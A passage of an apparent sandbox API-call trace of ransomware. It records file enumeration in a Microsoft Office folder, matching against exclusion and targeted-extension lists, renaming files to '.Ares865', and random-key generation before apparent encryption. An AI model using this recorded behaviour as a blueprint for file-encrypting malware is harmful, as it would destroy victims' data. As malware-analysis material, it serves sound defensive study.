lpString2="nrmlib") returned -1 [0065.130] lstrlenW (lpString="ns2") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0065.130] lstrlenW (lpString="ns3") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0065.131] lstrlenW (lpString="ns4") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0065.131] lstrlenW (lpString="nsf") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0065.131] lstrlenW (lpString="nv") returned 2 [0065.131] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0065.131] lstrlenW (lpString="nv2") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0065.131] lstrlenW (lpString="nwdb") returned 4 [0065.131] lstrcmpiW (lpString1=".dll", lpString2="nwdb") returned -1 [0065.131] lstrlenW (lpString="nyf") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0065.131] lstrlenW (lpString="odb") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0065.131] lstrlenW (lpString="odb") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0065.131] lstrlenW (lpString="oqy") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0065.131] lstrlenW (lpString="ora") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0065.131] lstrlenW (lpString="orx") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0065.131] lstrlenW (lpString="owc") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0065.131] lstrlenW (lpString="p96") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0065.131] lstrlenW (lpString="p97") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0065.131] lstrlenW (lpString="pan") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0065.131] lstrlenW (lpString="pdb") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0065.131] lstrlenW (lpString="pdm") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0065.131] lstrlenW (lpString="pnz") returned 3 [0065.131] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0065.132] lstrlenW (lpString="qry") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0065.132] lstrlenW (lpString="qvd") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0065.132] lstrlenW (lpString="rbf") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0065.132] lstrlenW (lpString="rctd") returned 4 [0065.132] lstrcmpiW (lpString1=".dll", lpString2="rctd") returned -1 [0065.132] lstrlenW (lpString="rod") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0065.132] lstrlenW (lpString="rodx") returned 4 [0065.132] lstrcmpiW (lpString1=".dll", lpString2="rodx") returned -1 [0065.132] lstrlenW (lpString="rpd") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0065.132] lstrlenW (lpString="rsd") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0065.132] lstrlenW (lpString="sas7bdat") returned 8 [0065.132] lstrcmpiW (lpString1="ring.dll", lpString2="sas7bdat") returned -1 [0065.132] lstrlenW (lpString="sbf") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0065.132] lstrlenW (lpString="scx") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0065.132] lstrlenW (lpString="sdb") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0065.132] lstrlenW (lpString="sdc") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0065.132] lstrlenW (lpString="sdf") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0065.132] lstrlenW (lpString="sis") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0065.132] lstrlenW (lpString="spq") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0065.132] lstrlenW (lpString="te") returned 2 [0065.132] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0065.132] lstrlenW (lpString="teacher") returned 7 [0065.132] lstrcmpiW (lpString1="ing.dll", lpString2="teacher") returned -1 [0065.132] lstrlenW (lpString="tmd") returned 3 [0065.132] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0065.133] lstrlenW (lpString="tps") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0065.133] lstrlenW (lpString="trc") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0065.133] lstrlenW (lpString="trc") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0065.133] lstrlenW (lpString="trm") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0065.133] lstrlenW (lpString="udb") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0065.133] lstrlenW (lpString="udl") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0065.133] lstrlenW (lpString="usr") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0065.133] lstrlenW (lpString="v12") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0065.133] lstrlenW (lpString="vis") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0065.133] lstrlenW (lpString="vpd") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0065.133] lstrlenW (lpString="vvv") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0065.133] lstrlenW (lpString="wdb") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0065.133] lstrlenW (lpString="wmdb") returned 4 [0065.133] lstrcmpiW (lpString1=".dll", lpString2="wmdb") returned -1 [0065.133] lstrlenW (lpString="wrk") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0065.133] lstrlenW (lpString="xdb") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0065.133] lstrlenW (lpString="xld") returned 3 [0065.133] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0065.133] lstrlenW (lpString="xmlff") returned 5 [0065.133] lstrcmpiW (lpString1="g.dll", lpString2="xmlff") returned -1 [0065.133] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa52c0600, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x853ab920, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa52c0600, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x67760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="microsoft.office.workflow.actions.proxy.dll", cAlternateFileName="MIF37A~1.DLL")) returned 1 [0065.133] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.133] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="aoldtz.exe") returned 1 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2=".") returned 1 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="..") returned 1 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="windows") returned -1 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="bootmgr") returned 1 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="temp") returned -1 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="pagefile.sys") returned -1 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="boot") returned 1 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="ids.txt") returned 1 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="ntuser.dat") returned -1 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="perflogs") returned -1 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="MSBuild") returned -1 [0065.134] lstrlenW (lpString="microsoft.office.workflow.actions.proxy.dll") returned 43 [0065.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll") returned 95 [0065.134] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="microsoft.office.workflow.actions.proxy.dll" | out: lpString1="microsoft.office.workflow.actions.proxy.dll") returned="microsoft.office.workflow.actions.proxy.dll" [0065.134] lstrlenW (lpString="microsoft.office.workflow.actions.proxy.dll") returned 43 [0065.134] lstrlenW (lpString="Ares865") returned 7 [0065.134] lstrcmpiW (lpString1="oxy.dll", lpString2="Ares865") returned 1 [0065.134] lstrlenW (lpString=".dll") returned 4 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2=".dll") returned 1 [0065.134] lstrlenW (lpString=".lnk") returned 4 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2=".lnk") returned 1 [0065.134] lstrlenW (lpString=".ini") returned 4 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2=".ini") returned 1 [0065.134] lstrlenW (lpString=".sys") returned 4 [0065.134] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2=".sys") returned 1 [0065.134] lstrlenW (lpString="microsoft.office.workflow.actions.proxy.dll") returned 43 [0065.134] lstrlenW (lpString="bak") returned 3 [0065.134] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0065.134] lstrlenW (lpString="ba_") returned 3 [0065.134] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0065.134] lstrlenW (lpString="dbb") returned 3 [0065.134] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0065.134] lstrlenW (lpString="vmdk") returned 4 [0065.134] lstrcmpiW (lpString1=".dll", lpString2="vmdk") returned -1 [0065.134] lstrlenW (lpString="rar") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0065.135] lstrlenW (lpString="zip") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0065.135] lstrlenW (lpString="tgz") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0065.135] lstrlenW (lpString="vbox") returned 4 [0065.135] lstrcmpiW (lpString1=".dll", lpString2="vbox") returned -1 [0065.135] lstrlenW (lpString="vdi") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0065.135] lstrlenW (lpString="vhd") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0065.135] lstrlenW (lpString="vhdx") returned 4 [0065.135] lstrcmpiW (lpString1=".dll", lpString2="vhdx") returned -1 [0065.135] lstrlenW (lpString="avhd") returned 4 [0065.135] lstrcmpiW (lpString1=".dll", lpString2="avhd") returned -1 [0065.135] lstrlenW (lpString="db") returned 2 [0065.135] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0065.135] lstrlenW (lpString="db2") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0065.135] lstrlenW (lpString="db3") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0065.135] lstrlenW (lpString="dbf") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0065.135] lstrlenW (lpString="mdf") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0065.135] lstrlenW (lpString="mdb") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0065.135] lstrlenW (lpString="sql") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0065.135] lstrlenW (lpString="sqlite") returned 6 [0065.135] lstrcmpiW (lpString1="xy.dll", lpString2="sqlite") returned 1 [0065.135] lstrlenW (lpString="sqlite3") returned 7 [0065.135] lstrcmpiW (lpString1="oxy.dll", lpString2="sqlite3") returned -1 [0065.135] lstrlenW (lpString="sqlitedb") returned 8 [0065.135] lstrcmpiW (lpString1="roxy.dll", lpString2="sqlitedb") returned -1 [0065.135] lstrlenW (lpString="xml") returned 3 [0065.135] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0065.136] lstrlenW (lpString="$er") returned 3 [0065.136] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0065.136] lstrlenW (lpString="4dd") returned 3 [0065.136] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0065.136] lstrlenW (lpString="4dl") returned 3 [0065.136] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0065.136] lstrlenW (lpString="^^^") returned 3 [0065.136] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0065.136] lstrlenW (lpString="abs") returned 3 [0065.136] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0065.136] lstrlenW (lpString="abx") returned 3 [0065.136] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0065.136] lstrlenW (lpString="accdb") returned 5 [0065.136] lstrcmpiW (lpString1="y.dll", lpString2="accdb") returned 1 [0065.136] lstrlenW (lpString="accdc") returned 5 [0065.136] lstrcmpiW (lpString1="y.dll", lpString2="accdc") returned 1 [0065.136] lstrlenW (lpString="accde") returned 5 [0065.136] lstrcmpiW (lpString1="y.dll", lpString2="accde") returned 1 [0065.136] lstrlenW (lpString="accdr") returned 5 [0065.136] lstrcmpiW (lpString1="y.dll", lpString2="accdr") returned 1 [0065.136] lstrlenW (lpString="accdt") returned 5 [0065.136] lstrcmpiW (lpString1="y.dll", lpString2="accdt") returned 1 [0065.136] lstrlenW (lpString="accdw") returned 5 [0065.136] lstrcmpiW (lpString1="y.dll", lpString2="accdw") returned 1 [0065.136] lstrlenW (lpString="accft") returned 5 [0065.136] lstrcmpiW (lpString1="y.dll", lpString2="accft") returned 1 [0065.136] lstrlenW (lpString="adb") returned 3 [0065.136] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0065.136] lstrlenW (lpString="adb") returned 3 [0065.136] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0065.136] lstrlenW (lpString="ade") returned 3 [0065.136] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0065.136] lstrlenW (lpString="adf") returned 3 [0065.136] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0065.136] lstrlenW (lpString="adn") returned 3 [0065.136] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0065.136] lstrlenW (lpString="adp") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0065.137] lstrlenW (lpString="alf") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0065.137] lstrlenW (lpString="ask") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0065.137] lstrlenW (lpString="btr") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0065.137] lstrlenW (lpString="cat") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0065.137] lstrlenW (lpString="cdb") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0065.137] lstrlenW (lpString="ckp") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0065.137] lstrlenW (lpString="cma") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0065.137] lstrlenW (lpString="cpd") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0065.137] lstrlenW (lpString="dacpac") returned 6 [0065.137] lstrcmpiW (lpString1="xy.dll", lpString2="dacpac") returned 1 [0065.137] lstrlenW (lpString="dad") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0065.137] lstrlenW (lpString="dadiagrams") returned 10 [0065.137] lstrcmpiW (lpString1=".proxy.dll", lpString2="dadiagrams") returned -1 [0065.137] lstrlenW (lpString="daschema") returned 8 [0065.137] lstrcmpiW (lpString1="roxy.dll", lpString2="daschema") returned 1 [0065.137] lstrlenW (lpString="db-journal") returned 10 [0065.137] lstrcmpiW (lpString1=".proxy.dll", lpString2="db-journal") returned -1 [0065.137] lstrlenW (lpString="db-shm") returned 6 [0065.137] lstrcmpiW (lpString1="xy.dll", lpString2="db-shm") returned 1 [0065.137] lstrlenW (lpString="db-wal") returned 6 [0065.137] lstrcmpiW (lpString1="xy.dll", lpString2="db-wal") returned 1 [0065.137] lstrlenW (lpString="dbc") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0065.137] lstrlenW (lpString="dbs") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0065.137] lstrlenW (lpString="dbt") returned 3 [0065.137] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0065.137] lstrlenW (lpString="dbv") returned 3 [0065.138] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0065.138] lstrlenW (lpString="dbx") returned 3 [0065.138] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0065.138] lstrlenW (lpString="dcb") returned 3 [0065.138] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0065.138] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17441800, ftCreationTime.dwHighDateTime=0x1cac1f4, ftLastAccessTime.dwLowDateTime=0x5687ccb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17441800, ftLastWriteTime.dwHighDateTime=0x1cac1f4, nFileSizeHigh=0x0, nFileSizeLow=0x7d780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.SharePoint.BusinessData.Administration.Client.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="aoldtz.exe") returned 1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2=".") returned 1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="..") returned 1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="windows") returned -1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="bootmgr") returned 1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="temp") returned -1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="pagefile.sys") returned -1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="boot") returned 1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="ids.txt") returned 1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="ntuser.dat") returned -1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="perflogs") returned -1 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="MSBuild") returned -1 [0065.138] lstrlenW (lpString="Microsoft.SharePoint.BusinessData.Administration.Client.dll") returned 59 [0065.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\microsoft.office.workflow.actions.proxy.dll") returned 86 [0065.138] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="Microsoft.SharePoint.BusinessData.Administration.Client.dll" | out: lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll") returned="Microsoft.SharePoint.BusinessData.Administration.Client.dll" [0065.138] lstrlenW (lpString="Microsoft.SharePoint.BusinessData.Administration.Client.dll") returned 59 [0065.138] lstrlenW (lpString="Ares865") returned 7 [0065.138] lstrcmpiW (lpString1="ent.dll", lpString2="Ares865") returned 1 [0065.138] lstrlenW (lpString=".dll") returned 4 [0065.138] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2=".dll") returned 1 [0065.139] lstrlenW (lpString=".lnk") returned 4 [0065.139] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2=".lnk") returned 1 [0065.139] lstrlenW (lpString=".ini") returned 4 [0065.139] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2=".ini") returned 1 [0065.139] lstrlenW (lpString=".sys") returned 4 [0065.139] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2=".sys") returned 1 [0065.139] lstrlenW (lpString="Microsoft.SharePoint.BusinessData.Administration.Client.dll") returned 59 [0065.139] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe853200, ftCreationTime.dwHighDateTime=0x1ca24ae, ftLastAccessTime.dwLowDateTime=0x5687ccb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe853200, ftLastWriteTime.dwHighDateTime=0x1ca24ae, nFileSizeHigh=0x0, nFileSizeLow=0x311b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.SharePoint.BusinessData.Administration.Client.xml", cAlternateFileName="MICROS~2.XML")) returned 1 [0065.149] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="aoldtz.exe") returned 1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2=".") returned 1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="..") returned 1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="windows") returned -1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="bootmgr") returned 1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="temp") returned -1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="pagefile.sys") returned -1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="boot") returned 1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="ids.txt") returned 1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="ntuser.dat") returned -1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="perflogs") returned -1 [0065.150] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="MSBuild") returned -1 [0065.150] lstrlenW (lpString="Microsoft.SharePoint.BusinessData.Administration.Client.xml") returned 59 [0065.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.dll") returned 102 [0065.150] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="Microsoft.SharePoint.BusinessData.Administration.Client.xml" | out: lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml") returned="Microsoft.SharePoint.BusinessData.Administration.Client.xml" [0065.150] lstrlenW (lpString="Microsoft.SharePoint.BusinessData.Administration.Client.xml") returned 59 [0065.150] lstrlenW (lpString="Ares865") returned 7 [0065.151] lstrcmpiW (lpString1="ent.xml", lpString2="Ares865") returned 1 [0065.151] lstrlenW (lpString=".dll") returned 4 [0065.151] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2=".dll") returned 1 [0065.151] lstrlenW (lpString=".lnk") returned 4 [0065.151] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2=".lnk") returned 1 [0065.151] lstrlenW (lpString=".ini") returned 4 [0065.151] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2=".ini") returned 1 [0065.151] lstrlenW (lpString=".sys") returned 4 [0065.151] lstrcmpiW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2=".sys") returned 1 [0065.151] lstrlenW (lpString="Microsoft.SharePoint.BusinessData.Administration.Client.xml") returned 59 [0065.151] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.xml.Ares865") returned 110 [0065.151] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.sharepoint.businessdata.administration.client.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.sharepoint.businessdata.administration.client.xml.ares865"), dwFlags=0x1) returned 1 [0065.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.sharepoint.businessdata.administration.client.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0065.152] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=201136) returned 1 [0065.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0065.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0065.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0065.152] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0065.153] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0065.153] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.153] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x314b0, lpName=0x0) returned 0x154 [0065.155] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x314b0) returned 0x420000 [0065.616] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0065.618] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0065.618] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.655] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0065.659] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OEMPRINT.CAT.Ares865") returned 63 [0065.659] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OEMPRINT.CAT" (normalized: "c:\\program files\\microsoft office\\office14\\oemprint.cat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OEMPRINT.CAT.Ares865" (normalized: 